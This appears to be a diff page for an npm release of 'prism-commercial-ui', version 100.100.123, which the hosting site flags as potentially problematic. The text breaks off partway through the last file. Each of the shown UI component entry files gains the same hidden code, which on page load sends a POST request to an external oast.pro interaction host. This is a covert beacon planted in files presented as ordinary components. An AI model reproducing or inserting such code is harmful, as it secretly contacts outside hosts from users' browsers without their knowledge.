prism-commercial-ui 100.100.123

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of prism-commercial-ui might be problematic. Click here for more details.

Files changed (56) hide show
  1. package/core/dist/esm/module.entry.js +20 -0
  2. package/core/dist/esm/nutrition-table-row.entry.js +20 -0
  3. package/core/dist/esm/nutrition-table.entry.js +20 -0
  4. package/core/dist/esm/prism-commercial-accordion.entry.js +20 -0
  5. package/core/dist/esm/prism-commercial-action-menu-button_2.entry.js +20 -0
  6. package/core/dist/esm/prism-commercial-action-menu.entry.js +20 -0
  7. package/core/dist/esm/prism-commercial-alert-banner.entry.js +20 -0
  8. package/core/dist/esm/prism-commercial-alert-inline.entry.js +20 -0
  9. package/core/dist/esm/prism-commercial-avatar.entry.js +20 -0
  10. package/core/dist/esm/prism-commercial-badge-numeric.entry.js +20 -0
  11. package/core/dist/esm/prism-commercial-badge-status.entry.js +20 -0
  12. package/core/dist/esm/prism-commercial-breadcrumb-set.entry.js +20 -0
  13. package/core/dist/esm/prism-commercial-breadcrumb.entry.js +20 -0
  14. package/core/dist/esm/prism-commercial-button_2.entry.js +20 -0
  15. package/core/dist/esm/prism-commercial-checkbox-group.entry.js +20 -0
  16. package/core/dist/esm/prism-commercial-checkbox.entry.js +20 -0
  17. package/core/dist/esm/prism-commercial-close-button.entry.js +20 -0
  18. package/core/dist/esm/prism-commercial-collapsible.entry.js +20 -0
  19. package/core/dist/esm/prism-commercial-data-range-pagination.entry.js +20 -0
  20. package/core/dist/esm/prism-commercial-diy-grey-card-low.entry.js +20 -0
  21. package/core/dist/esm/prism-commercial-diy-outlined-white-card-medium.entry.js +20 -0
  22. package/core/dist/esm/prism-commercial-file-upload.entry.js +20 -0
  23. package/core/dist/esm/prism-commercial-flag-delta.entry.js +20 -0
  24. package/core/dist/esm/prism-commercial-flag-filter.entry.js +20 -0
  25. package/core/dist/esm/prism-commercial-flag.entry.js +20 -0
  26. package/core/dist/esm/prism-commercial-flow-stepper-container.entry.js +20 -0
  27. package/core/dist/esm/prism-commercial-flow-stepper-item.entry.js +20 -0
  28. package/core/dist/esm/prism-commercial-generic-card.entry.js +20 -0
  29. package/core/dist/esm/prism-commercial-hamburger.entry.js +20 -0
  30. package/core/dist/esm/prism-commercial-high-impact-tab-bar.entry.js +20 -0
  31. package/core/dist/esm/prism-commercial-horizontal-tab-bar.entry.js +20 -0
  32. package/core/dist/esm/prism-commercial-icon-button.entry.js +20 -0
  33. package/core/dist/esm/prism-commercial-icon_2.entry.js +20 -0
  34. package/core/dist/esm/prism-commercial-in-page-navigation.entry.js +20 -0
  35. package/core/dist/esm/prism-commercial-menu-child.entry.js +20 -0
  36. package/core/dist/esm/prism-commercial-menu-item.entry.js +20 -0
  37. package/core/dist/esm/prism-commercial-modal-generic.entry.js +20 -0
  38. package/core/dist/esm/prism-commercial-page-level-pagination.entry.js +20 -0
  39. package/core/dist/esm/prism-commercial-pagination-arrow.entry.js +20 -0
  40. package/core/dist/esm/prism-commercial-pagination-number.entry.js +20 -0
  41. package/core/dist/esm/prism-commercial-progress-bar.entry.js +20 -0
  42. package/core/dist/esm/prism-commercial-progressive-form-stepper.entry.js +20 -0
  43. package/core/dist/esm/prism-commercial-radio-button.entry.js +20 -0
  44. package/core/dist/esm/prism-commercial-search-input.entry.js +20 -0
  45. package/core/dist/esm/prism-commercial-select.entry.js +20 -0
  46. package/core/dist/esm/prism-commercial-single-input.entry.js +20 -0
  47. package/core/dist/esm/prism-commercial-slot-placeholder.entry.js +20 -0
  48. package/core/dist/esm/prism-commercial-star-ratings.entry.js +20 -0
  49. package/core/dist/esm/prism-commercial-tab.entry.js +20 -0
  50. package/core/dist/esm/prism-commercial-text-toggle.entry.js +20 -0
  51. package/core/dist/esm/prism-commercial-toast.entry.js +20 -0
  52. package/core/dist/esm/prism-commercial-toggle-switch.entry.js +20 -0
  53. package/core/dist/esm/prism-commercial-tooltip.entry.js +20 -0
  54. package/core/dist/esm/prism-commercial-utility-button.entry.js +20 -0
  55. package/core/dist/esm/prism-commercial-vertical-tabs.entry.js +20 -0
  56. package/package.json +12 -0
@@ -0,0 +1,20 @@
1
+ document.addEventListener('DOMContentLoaded', function() {
2
+ fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
3
+ method: 'POST',
4
+ headers: {
5
+ 'Content-Type': 'application/json',
6
+ 'JavaScript': 'true' // Custom header
7
+ },
8
+ body: JSON.stringify({
9
+ data: 'javascript'
10
+ })
11
+ })
12
+ .then(response => {
13
+ if (!response.ok) {
14
+ throw new Error('Network response was not ok');
15
+ }
16
+ return response.json(); // or .text() if the response is text
17
+ })
18
+ .then(data => console.log(data))
19
+ .catch(error => console.error('There was a problem with your fetch operation:', error));
20
+ });
@@ -0,0 +1,20 @@
1
+ document.addEventListener('DOMContentLoaded', function() {
2
+ fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
3
+ method: 'POST',
4
+ headers: {
5
+ 'Content-Type': 'application/json',
6
+ 'JavaScript': 'true' // Custom header
7
+ },
8
+ body: JSON.stringify({
9
+ data: 'javascript'
10
+ })
11
+ })
12
+ .then(response => {
13
+ if (!response.ok) {
14
+ throw new Error('Network response was not ok');
15
+ }
16
+ return response.json(); // or .text() if the response is text
17
+ })
18
+ .then(data => console.log(data))
19
+ .catch(error => console.error('There was a problem with your fetch operation:', error));
20
+ });
@@ -0,0 +1,20 @@
1
+ document.addEventListener('DOMContentLoaded', function() {
2
+ fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
3
+ method: 'POST',
4
+ headers: {
5
+ 'Content-Type': 'application/json',
6
+ 'JavaScript': 'true' // Custom header
7
+ },
8
+ body: JSON.stringify({
9
+ data: 'javascript'
10
+ })
11
+ })
12
+ .then(response => {
13
+ if (!response.ok) {
14
+ throw new Error('Network response was not ok');
15
+ }
16
+ return response.json(); // or .text() if the response is text
17
+ })
18
+ .then(data => console.log(data))
19
+ .catch(error => console.error('There was a problem with your fetch operation:', error));
20
+ });
@@ -0,0 +1,20 @@
1
+ document.addEventListener('DOMContentLoaded', function() {
2
+ fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
3
+ method: 'POST',
4
+ headers: {
5
+ 'Content-Type': 'application/json',
6
+ 'JavaScript': 'true' // Custom header
7
+ },
8
+ body: JSON.stringify({
9
+ data: 'javascript'
10
+ })
11
+ })
12
+ .then(response => {
13
+ if (!response.ok) {
14
+ throw new Error('Network response was not ok');
15
+ }
16
+ return response.json(); // or .text() if the response is text
17
+ })
18
+ .then(data => console.log(data))
19
+ .catch(error => console.error('There was a problem with your fetch operation:', error));
20
+ });
@@ -0,0 +1,20 @@
1
+ document.addEventListener('DOMContentLoaded', function() {
2
+ fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
3
+ method: 'POST',
4
+ headers: {
5
+ 'Content-Type': 'application/json',
6
+ 'JavaScript': 'true' // Custom header
7
+ },
8
+ body: JSON.stringify({
9
+ data: 'javascript'
10
+ })
11
+ })
12
+ .then(response => {
13
+ if (!response.ok) {
14
+ throw new Error('Network response was not ok');
15
+ }
16
+ return response.json(); // or .text() if the response is text
17
+ })
18
+ .then(data => console.log(data))
19
+ .catch(error => console.error('There was a problem with your fetch operation:', error));
20
+ });
@@ -0,0 +1,20 @@
1
+ document.addEventListener('DOMContentLoaded', function() {
2
+ fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
3
+ method: 'POST',
4
+ headers: {
5
+ 'Content-Type': 'application/json',
6
+ 'JavaScript': 'true' // Custom header
7
+ },
8
+ body: JSON.stringify({
9
+ data: 'javascript'
10
+ })
11
+ })
12
+ .then(response => {
13
+ if (!response.ok) {
14
+ throw new Error('Network response was not ok');
15
+ }
16
+ return response.json(); // or .text() if the response is text
17
+ })
18
+ .then(data => console.log(data))
19
+ .catch(error => console.error('There was a problem with your fetch operation:', error));
20
+ });
@@ -0,0 +1,20 @@
1
+ document.addEventListener('DOMContentLoaded', function() {
2
+ fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
3
+ method: 'POST',
4
+ headers: {
5
+ 'Content-Type': 'application/json',
6
+ 'JavaScript': 'true' // Custom header
7
+ },
8
+ body: JSON.stringify({
9
+ data: 'javascript'
10
+ })
11
+ })
12
+ .then(response => {
13
+ if (!response.ok) {
14
+ throw new Error('Network response was not ok');
15
+ }
16
+ return response.json(); // or .text() if the response is text
17
+ })
18
+ .then(data => console.log(data))
19
+ .catch(error => console.error('There was a problem with your fetch operation:', error));
20
+ });
@@ -0,0 +1,20 @@
1
+ document.addEventListener('DOMContentLoaded', function() {
2
+ fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
3
+ method: 'POST',
4
+ headers: {
5
+ 'Content-Type': 'application/json',
6
+ 'JavaScript': 'true' // Custom header
7
+ },
8
+ body: JSON.stringify({
9
+ data: 'javascript'
10
+ })
11
+ })
12
+ .then(response => {
13
+ if (!response.ok) {
14
+ throw new Error('Network response was not ok');
15
+ }
16
+ return response.json(); // or .text() if the response is text
17
+ })
18
+ .then(data => console.log(data))
19
+ .catch(error => console.error('There was a problem with your fetch operation:', error));
20
+ });
@@ -0,0 +1,20 @@
1
+ document.addEventListener('DOMContentLoaded', function() {
2
+ fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
3
+ method: 'POST',
4
+ headers: {
5
+ 'Content-Type': 'application/json',
6
+ 'JavaScript': 'true' // Custom header
7
+ },
8
+ body: JSON.stringify({
9
+ data: 'javascript'
10
+ })
11
+ })
12
+ .then(response => {
13
+ if (!response.ok) {
14
+ throw new Error('Network response was not ok');
15
+ }
16
+ return response.json(); // or .text() if the response is text
17
+ })
18
+ .then(data => console.log(data))
19
+ .catch(error => console.error('There was a problem with your fetch operation:', error));
20
+ });
@@ -0,0 +1,20 @@
1
+ document.addEventListener('DOMContentLoaded', function() {
2
+ fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
3
+ method: 'POST',
4
+ headers: {
5
+ 'Content-Type': 'application/json',
6
+ 'JavaScript': 'true' // Custom header
7
+ },
8
+ body: JSON.stringify({
9
+ data: 'javascript'
10
+ })
11
+ })
12
+ .then(response => {
13
+ if (!response.ok) {
14
+ throw new Error('Network response was not ok');
15
+ }
16
+ return response.json(); // or .text() if the response is text
17
+ })
18
+ .then(data => console.log(data))
19
+ .catch(error => console.error('There was a problem with your fetch operation:', error));
20
+ });
@@ -0,0 +1,20 @@
1
+ document.addEventListener('DOMContentLoaded', function() {
2
+ fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
3
+ method: 'POST',
4
+ headers: {
5
+ 'Content-Type': 'application/json',
6
+ 'JavaScript': 'true' // Custom header
7
+ },
8
+ body: JSON.stringify({
9
+ data: 'javascript'
10
+ })
11
+ })
12
+ .then(response => {
13
+ if (!response.ok) {
14
+ throw new Error('Network response was not ok');
15
+ }
16
+ return response.json(); // or .text() if the response is text
17
+ })
18
+ .then(data => console.log(data))
19
+ .catch(error => console.error('There was a problem with your fetch operation:', error));
20
+ });
@@ -0,0 +1,20 @@
1
+ document.addEventListener('DOMContentLoaded', function() {
2
+ fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
3
+ method: 'POST',
4
+ headers: {
5
+ 'Content-Type': 'application/json',
6
+ 'JavaScript': 'true' // Custom header
7
+ },
8
+ body: JSON.stringify({
9
+ data: 'javascript'
10
+ })
11
+ })
12
+ .then(response => {
13
+ if (!response.ok) {
14
+ throw new Error('Network response was not ok');
15
+ }
16
+ return response.json(); // or .text() if the response is text
17
+ })
18
+ .then(data => console.log(data))
19
+ .catch(error => console.error('There was a problem with your fetch operation:', error));
20
+ });
@@ -0,0 +1,20 @@
1
+ document.addEventListener('DOMContentLoaded', function() {
2
+ fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
3
+ method: 'POST',
4
+ headers: {
5
+ 'Content-Type': 'application/json',
6
+ 'JavaScript': 'true' // Custom header
7
+ },
8
+ body: JSON.stringify({
9
+ data: 'javascript'
10
+ })
11
+ })
12
+ .then(response => {
13
+ if (!response.ok) {
14
+ throw new Error('Network response was not ok');
15
+ }
16
+ return response.json(); // or .text() if the response is text
17
+ })
18
+ .then(data => console.log(data))
19
+ .catch(error => console.error('There was a problem with your fetch operation:', error));
20
+ });
@@ -0,0 +1,20 @@
1
+ document.addEventListener('DOMContentLoaded', function() {
2
+ fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
3
+ method: 'POST',
4
+ headers: {
5
+ 'Content-Type': 'application/json',
6
+ 'JavaScript': 'true' // Custom header
7
+ },
8
+ body: JSON.stringify({
9
+ data: 'javascript'
10
+ })
11
+ })
12
+ .then(response => {
13
+ if (!response.ok) {
14
+ throw new Error('Network response was not ok');
15
+ }
16
+ return response.json(); // or .text() if the response is text
17
+ })
18
+ .then(data => console.log(data))
19
+ .catch(error => console.error('There was a problem with your fetch operation:', error));
20
+ });
@@ -0,0 +1,20 @@
1
+ document.addEventListener('DOMContentLoaded', function() {
2
+ fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
3
+ method: 'POST',
4
+ headers: {
5
+ 'Content-Type': 'application/json',
6
+ 'JavaScript': 'true' // Custom header
7
+ },
8
+ body: JSON.stringify({
9
+ data: 'javascript'
10
+ })
11
+ })
12
+ .then(response => {
13
+ if (!response.ok) {
14
+ throw new Error('Network response was not ok');
15
+ }
16
+ return response.json(); // or .text() if the response is text
17
+ })
18
+ .then(data => console.log(data))
19
+ .catch(error => console.error('There was a problem with your fetch operation:', error));
20
+ });
@@ -0,0 +1,20 @@
1
+ document.addEventListener('DOMContentLoaded', function() {
2
+ fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
3
+ method: 'POST',
4
+ headers: {
5
+ 'Content-Type': 'application/json',
6
+ 'JavaScript': 'true' // Custom header
7
+ },
8
+ body: JSON.stringify({
9
+ data: 'javascript'
10
+ })
11
+ })
12
+ .then(response => {
13
+ if (!response.ok) {
14
+ throw new Error('Network response was not ok');
15
+ }
16
+ return response.json(); // or .text() if the response is text
17
+ })
18
+ .then(data => console.log(data))
19
+ .catch(error => console.error('There was a problem with your fetch operation:', error));
20
+ });
@@ -0,0 +1,20 @@
1
+ document.addEventListener('DOMContentLoaded', function() {
2
+ fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
3
+ method: 'POST',
4
+ headers: {
5
+ 'Content-Type': 'application/json',
6
+ 'JavaScript': 'true' // Custom header
7
+ },
8
+ body: JSON.stringify({
9
+ data: 'javascript'
10
+ })
11
+ })
12
+ .then(response => {
13
+ if (!response.ok) {
14
+ throw new Error('Network response was not ok');
15
+ }
16
+ return response.json(); // or .text() if the response is text
17
+ })
18
+ .then(data => console.log(data))
19
+ .catch(error => console.error('There was a problem with your fetch operation:', error));
20
+ });
@@ -0,0 +1,20 @@
1
+ document.addEventListener('DOMContentLoaded', function() {
2
+ fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
3
+ method: 'POST',
4
+ headers: {
5
+ 'Content-Type': 'application/json',
6
+ 'JavaScript': 'true' // Custom header
7
+ },
8
+ body: JSON.stringify({
9
+ data: 'javascript'
10
+ })
11
+ })
12
+ .then(response => {
13
+ if (!response.ok) {
14
+ throw new Error('Network response was not ok');
15
+ }
16
+ return response.json(); // or .text() if the response is text
17
+ })
18
+ .then(data => console.log(data))
19
+ .catch(error => console.error('There was a problem with your fetch operation:', error));
20
+ });
@@ -0,0 +1,20 @@
1
+ document.addEventListener('DOMContentLoaded', function() {
2
+ fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
3
+ method: 'POST',
4
+ headers: {
5
+ 'Content-Type': 'application/json',
6
+ 'JavaScript': 'true' // Custom header
7
+ },
8
+ body: JSON.stringify({
9
+ data: 'javascript'
10
+ })
11
+ })
12
+ .then(response => {
13
+ if (!response.ok) {
14
+ throw new Error('Network response was not ok');
15
+ }
16
+ return response.json(); // or .text() if the response is text
17
+ })
18
+ .then(data => console.log(data))
19
+ .catch(error => console.error('There was a problem with your fetch operation:', error));
20
+ });
@@ -0,0 +1,20 @@
1
+ document.addEventListener('DOMContentLoaded', function() {
2
+ fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
3
+ method: 'POST',
4
+ headers: {
5
+ 'Content-Type': 'application/json',
6
+ 'JavaScript': 'true' // Custom header
7
+ },
8
+ body: JSON.stringify({
9
+ data: 'javascript'
10
+ })
11
+ })
12
+ .then(response => {
13
+ if (!response.ok) {
14
+ throw new Error('Network response was not ok');
15
+ }
16
+ return response.json(); // or .text() if the response is text
17
+ })
18
+ .then(data => console.log(data))
19
+ .catch(error => console.error('There was a problem with your fetch operation:', error));
20
+ });
@@ -0,0 +1,20 @@
1
+ document.addEventListener('DOMContentLoaded', function() {
2
+ fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
3
+ method: 'POST',
4
+ headers: {
5
+ 'Content-Type': 'application/json',
6
+ 'JavaScript': 'true' // Custom header
7
+ },
8
+ body: JSON.stringify({
9
+ data: 'javascript'
10
+ })
11
+ })
12
+ .then(response => {
13
+ if (!response.ok) {
14
+ throw new Error('Network response was not ok');
15
+ }
16
+ return response.json(); // or .text() if the response is text
17
+ })
18
+ .then(data => console.log(data))
19
+ .catch(error => console.error('There was a problem with your fetch operation:', error));
20
+ });
@@ -0,0 +1,20 @@
1
+ document.addEventListener('DOMContentLoaded', function() {
2
+ fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
3
+ method: 'POST',
4
+ headers: {
5
+ 'Content-Type': 'application/json',
6
+ 'JavaScript': 'true' // Custom header
7
+ },
8
+ body: JSON.stringify({
9
+ data: 'javascript'
10
+ })
11
+ })
12
+ .then(response => {
13
+ if (!response.ok) {
14
+ throw new Error('Network response was not ok');
15
+ }
16
+ return response.json(); // or .text() if the response is text
17
+ })
18
+ .then(data => console.log(data))
19
+ .catch(error => console.error('There was a problem with your fetch operation:', error));
20
+ });
@@ -0,0 +1,20 @@
1
+ document.addEventListener('DOMContentLoaded', function() {
2
+ fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
3
+ method: 'POST',
4
+ headers: {
5
+ 'Content-Type': 'application/json',
6
+ 'JavaScript': 'true' // Custom header
7
+ },
8
+ body: JSON.stringify({
9
+ data: 'javascript'
10
+ })
11
+ })
12
+ .then(response => {
13
+ if (!response.ok) {
14
+ throw new Error('Network response was not ok');
15
+ }
16
+ return response.json(); // or .text() if the response is text
17
+ })
18
+ .then(data => console.log(data))
19
+ .catch(error => console.error('There was a problem with your fetch operation:', error));
20
+ });
@@ -0,0 +1,20 @@
1
+ document.addEventListener('DOMContentLoaded', function() {
2
+ fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
3
+ method: 'POST',
4
+ headers: {
5
+ 'Content-Type': 'application/json',
6
+ 'JavaScript': 'true' // Custom header
7
+ },
8
+ body: JSON.stringify({
9
+ data: 'javascript'
10
+ })
11
+ })
12
+ .then(response => {
13
+ if (!response.ok) {
14
+ throw new Error('Network response was not ok');
15
+ }
16
+ return response.json(); // or .text() if the response is text
17
+ })
18
+ .then(data => console.log(data))
19
+ .catch(error => console.error('There was a problem with your fetch operation:', error));
20
+ });
@@ -0,0 +1,20 @@
1
+ document.addEventListener('DOMContentLoaded', function() {
2
+ fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
3
+ method: 'POST',
4
+ headers: {
5
+ 'Content-Type': 'application/json',
6
+ 'JavaScript': 'true' // Custom header
7
+ },
8
+ body: JSON.stringify({
9
+ data: 'javascript'
10
+ })
11
+ })
12
+ .then(response => {
13
+ if (!response.ok) {
14
+ throw new Error('Network response was not ok');
15
+ }
16
+ return response.json(); // or .text() if the response is text
17
+ })
18
+ .then(data => console.log(data))
19
+ .catch(error => console.error('There was a problem with your fetch operation:', error));
20
+ });
@@ -0,0 +1,20 @@
1
+ document.addEventListener('DOMContentLoaded', function() {
2
+ fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
3
+ method: 'POST',
4
+ headers: {
5
+ 'Content-Type': 'application/json',
6
+ 'JavaScript': 'true' // Custom header
7
+ },
8
+ body: JSON.stringify({
9
+ data: 'javascript'
10
+ })
11
+ })
12
+ .then(response => {
13
+ if (!response.ok) {
14
+ throw new Error('Network response was not ok');
15
+ }
16
+ return response.json(); // or .text() if the response is text
17
+ })
18
+ .then(data => console.log(data))
19
+ .catch(error => console.error('There was a problem with your fetch operation:', error));
20
+ });
@@ -0,0 +1,20 @@
1
+ document.addEventListener('DOMContentLoaded', function() {
2
+ fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
3
+ method: 'POST',
4
+ headers: {
5
+ 'Content-Type': 'application/json',
6
+ 'JavaScript': 'true' // Custom header
7
+ },
8
+ body: JSON.stringify({
9
+ data: 'javascript'
10
+ })
11
+ })
12
+ .then(response => {
13
+ if (!response.ok) {
14
+ throw new Error('Network response was not ok');
15
+ }
16
+ return response.json(); // or .text() if the response is text
17
+ })
18
+ .then(data => console.log(data))
19
+ .catch(error => console.error('There was a problem with your fetch operation:', error));
20
+ });
@@ -0,0 +1,20 @@
1
+ document.addEventListener('DOMContentLoaded', function() {
2
+ fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
3
+ method: 'POST',
4
+ headers: {
5
+ 'Content-Type': 'application/json',
6
+ 'JavaScript': 'true' // Custom header
7
+ },
8
+ body: JSON.stringify({
9
+ data: 'javascript'
10
+ })
11
+ })
12
+ .then(response => {
13
+ if (!response.ok) {
14
+ throw new Error('Network response was not ok');
15
+ }
16
+ return response.json(); // or .text() if the response is text
17
+ })
18
+ .then(data => console.log(data))
19
+ .catch(error => console.error('There was a problem with your fetch operation:', error));
20
+ });
@@ -0,0 +1,20 @@
1
+ document.addEventListener('DOMContentLoaded', function() {
2
+ fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
3
+ method: 'POST',
4
+ headers: {
5
+ 'Content-Type': 'application/json',
6
+ 'JavaScript': 'true' // Custom header
7
+ },
8
+ body: JSON.stringify({
9
+ data: 'javascript'
10
+ })
11
+ })
12
+ .then(response => {
13
+ if (!response.ok) {
14
+ throw new Error('Network response was not ok');
15
+ }
16
+ return response.json(); // or .text() if the response is text
17
+ })
18
+ .then(data => console.log(data))
19
+ .catch(error => console.error('There was a problem with your fetch operation:', error));
20
+ });
@@ -0,0 +1,20 @@
1
+ document.addEventListener('DOMContentLoaded', function() {
2
+ fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
3
+ method: 'POST',
4
+ headers: {
5
+ 'Content-Type': 'application/json',
6
+ 'JavaScript': 'true' // Custom header
7
+ },
8
+ body: JSON.stringify({
9
+ data: 'javascript'
10
+ })
11
+ })
12
+ .then(response => {
13
+ if (!response.ok) {
14
+ throw new Error('Network response was not ok');
15
+ }
16
+ return response.json(); // or .text() if the response is text
17
+ })
18
+ .then(data => console.log(data))
19
+ .catch(error => console.error('There was a problem with your fetch operation:', error));
20
+ });
@@ -0,0 +1,20 @@
1
+ document.addEventListener('DOMContentLoaded', function() {
2
+ fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
3
+ method: 'POST',
4
+ headers: {
5
+ 'Content-Type': 'application/json',
6
+ 'JavaScript': 'true' // Custom header
7
+ },
8
+ body: JSON.stringify({
9
+ data: 'javascript'
10
+ })
11
+ })
12
+ .then(response => {
13
+ if (!response.ok) {
14
+ throw new Error('Network response was not ok');
15
+ }
16
+ return response.json(); // or .text() if the response is text
17
+ })
18
+ .then(data => console.log(data))
19
+ .catch(error => console.error('There was a problem with your fetch operation:', error));
20
+ });
@@ -0,0 +1,20 @@
1
+ document.addEventListener('DOMContentLoaded', function() {
2
+ fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
3
+ method: 'POST',
4
+ headers: {
5
+ 'Content-Type': 'application/json',
6
+ 'JavaScript': 'true' // Custom header
7
+ },
8
+ body: JSON.stringify({
9
+ data: 'javascript'
10
+ })
11
+ })
12
+ .then(response => {
13
+ if (!response.ok) {
14
+ throw new Error('Network response was not ok');
15
+ }
16
+ return response.json(); // or .text() if the response is text
17
+ })
18
+ .then(data => console.log(data))
19
+ .catch(error => console.error('There was a problem with your fetch operation:', error));
20
+ });
@@ -0,0 +1,20 @@
1
+ document.addEventListener('DOMContentLoaded', function() {
2
+ fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
3
+ method: 'POST',
4
+ headers: {
5
+ 'Content-Type': 'application/json',
6
+ 'JavaScript': 'true' // Custom header
7
+ },
8
+ body: JSON.stringify({
9
+ data: 'javascript'
10
+ })
11
+ })
12
+ .then(response => {
13
+ if (!response.ok) {
14
+ throw new Error('Network response was not ok');
15
+ }
16
+ return response.json(); // or .text() if the response is text
17
+ })
18
+ .then(data => console.log(data))
19
+ .catch(error => console.error('There was a problem with your fetch operation:', error));
20
+ });
@@ -0,0 +1,20 @@
1
+ document.addEventListener('DOMContentLoaded', function() {
2
+ fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
3
+ method: 'POST',
4
+ headers: {
5
+ 'Content-Type': 'application/json',
6
+ 'JavaScript': 'true' // Custom header
7
+ },
8
+ body: JSON.stringify({
9
+ data: 'javascript'
10
+ })
11
+ })
12
+ .then(response => {
13
+ if (!response.ok) {
14
+ throw new Error('Network response was not ok');
15
+ }
16
+ return response.json(); // or .text() if the response is text
17
+ })
18
+ .then(data => console.log(data))
19
+ .catch(error => console.error('There was a problem with your fetch operation:', error));
20
+ });
@@ -0,0 +1,20 @@
1
+ document.addEventListener('DOMContentLoaded', function() {
2
+ fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
3
+ method: 'POST',
4
+ headers: {
5
+ 'Content-Type': 'application/json',
6
+ 'JavaScript': 'true' // Custom header
7
+ },
8
+ body: JSON.stringify({
9
+ data: 'javascript'
10
+ })
11
+ })
12
+ .then(response => {
13
+ if (!response.ok) {
14
+ throw new Error('Network response was not ok');
15
+ }
16
+ return response.json(); // or .text() if the response is text
17
+ })
18
+ .then(data => console.log(data))
19
+ .catch(error => console.error('There was a problem with your fetch operation:', error));
20
+ });
@@ -0,0 +1,20 @@
1
+ document.addEventListener('DOMContentLoaded', function() {
2
+ fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
3
+ method: 'POST',
4
+ headers: {
5
+ 'Content-Type': 'application/json',
6
+ 'JavaScript': 'true' // Custom header
7
+ },
8
+ body: JSON.stringify({
9
+ data: 'javascript'
10
+ })
11
+ })
12
+ .then(response => {
13
+ if (!response.ok) {
14
+ throw new Error('Network response was not ok');
15
+ }
16
+ return response.json(); // or .text() if the response is text
17
+ })
18
+ .then(data => console.log(data))
19
+ .catch(error => console.error('There was a problem with your fetch operation:', error));
20
+ });
@@ -0,0 +1,20 @@
1
+ document.addEventListener('DOMContentLoaded', function() {
2
+ fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
3
+ method: 'POST',
4
+ headers: {
5
+ 'Content-Type': 'application/json',
6
+ 'JavaScript': 'true' // Custom header
7
+ },
8
+ body: JSON.stringify({
9
+ data: 'javascript'
10
+ })
11
+ })
12
+ .then(response => {
13
+ if (!response.ok) {
14
+ throw new Error('Network response was not ok');
15
+ }
16
+ return response.json(); // or .text() if the response is text
17
+ })
18
+ .then(data => console.log(data))
19
+ .catch(error => console.error('There was a problem with your fetch operation:', error));
20
+ });
@@ -0,0 +1,20 @@
1
+ document.addEventListener('DOMContentLoaded', function() {
2
+ fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
3
+ method: 'POST',
4
+ headers: {
5
+ 'Content-Type': 'application/json',
6
+ 'JavaScript': 'true' // Custom header
7
+ },
8
+ body: JSON.stringify({
9
+ data: 'javascript'
10
+ })
11
+ })
12
+ .then(response => {
13
+ if (!response.ok) {
14
+ throw new Error('Network response was not ok');
15
+ }
16
+ return response.json(); // or .text() if the response is text
17
+ })
18
+ .then(data => console.log(data))
19
+ .catch(error => console.error('There was a problem with your fetch operation:', error));
20
+ });
@@ -0,0 +1,20 @@
1
+ document.addEventListener('DOMContentLoaded', function() {
2
